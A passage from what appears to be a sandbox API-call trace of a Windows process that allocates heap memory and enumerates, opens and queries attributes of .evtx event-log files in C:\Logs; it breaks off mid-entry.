RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0072.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0072.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0072.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x464a8 [0072.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0072.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0072.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0072.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0072.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0072.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0072.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0072.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0072.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0072.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0072.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0072.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0072.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0072.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0072.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0072.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0072.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0072.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0072.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0072.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0072.118] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.118] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.118] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.118] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0072.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0072.118] AreFileApisANSI () returned 1 [0072.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx", lpUsedDefaultChar=0x0) returned 57 [0072.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0072.118] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.118] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0072.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0072.119] AreFileApisANSI () returned 1 [0072.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0072.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0072.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 57 [0072.119] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.119] GetFileType (hFile=0x410) returned 0x1 [0072.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0072.119] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.119] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.120] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.120] CloseHandle (hObject=0x410) returned 1 [0072.120] AreFileApisANSI () returned 1 [0072.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0072.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0072.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 57 [0072.120] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.120] GetFileType (hFile=0x410) returned 0x1 [0072.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0072.120] CloseHandle (hObject=0x410) returned 1 [0072.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0072.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0072.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0072.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0072.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0072.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0072.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0072.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0072.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0072.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0072.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0072.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0072.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0072.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0072.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0072.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0072.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0072.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0072.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0072.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0072.121] AreFileApisANSI () returned 1 [0072.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0072.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a5b0 [0072.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 57 [0072.121] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59547c37, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x59547c37, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0072.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0072.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0072.121] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.121] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.121] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb7386e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbb7386e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-LiveId%4Operational.evtx", cAlternateFileName="MI4C58~1.EVT")) returned 1 [0072.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0072.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b80 [0072.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0072.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x464a8 [0072.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0072.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0072.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0072.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0072.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0072.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0072.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0072.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0072.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0072.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0072.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0072.122] AreFileApisANSI () returned 1 [0072.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx", lpUsedDefaultChar=0x0) returned 51 [0072.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0072.123] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.123] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0072.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0072.123] AreFileApisANSI () returned 1 [0072.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0072.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46358 [0072.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x46358, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 51 [0072.123] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.123] GetFileType (hFile=0x410) returned 0x1 [0072.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0072.123] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.123] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.124] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.124] CloseHandle (hObject=0x410) returned 1 [0072.124] AreFileApisANSI () returned 1 [0072.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0072.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x466d8 [0072.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x466d8, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 51 [0072.124] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.124] GetFileType (hFile=0x410) returned 0x1 [0072.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x466d8 | out: hHeap=0x20000) returned 1 [0072.124] CloseHandle (hObject=0x410) returned 1 [0072.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0072.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0072.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0072.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0072.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0072.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0072.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0072.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0072.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0072.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0072.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0072.125] AreFileApisANSI () returned 1 [0072.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0072.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x45e18 [0072.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x45e18, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 51 [0072.125] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb7386e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbb7386e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e18 | out: hHeap=0x20000) returned 1 [0072.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0072.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0072.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0072.125] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.125] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.125] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93d06f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93d06f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-MUI%4Admin.evtx", cAlternateFileName="MI30D3~1.EVT")) returned 1 [0072.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0072.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0072.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0072.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69440 [0072.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0072.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0072.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0072.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0072.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0072.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0072.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69440 | out: hHeap=0x20000) returned 1 [0072.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0072.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0072.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0072.126] RtlAllocateHeap 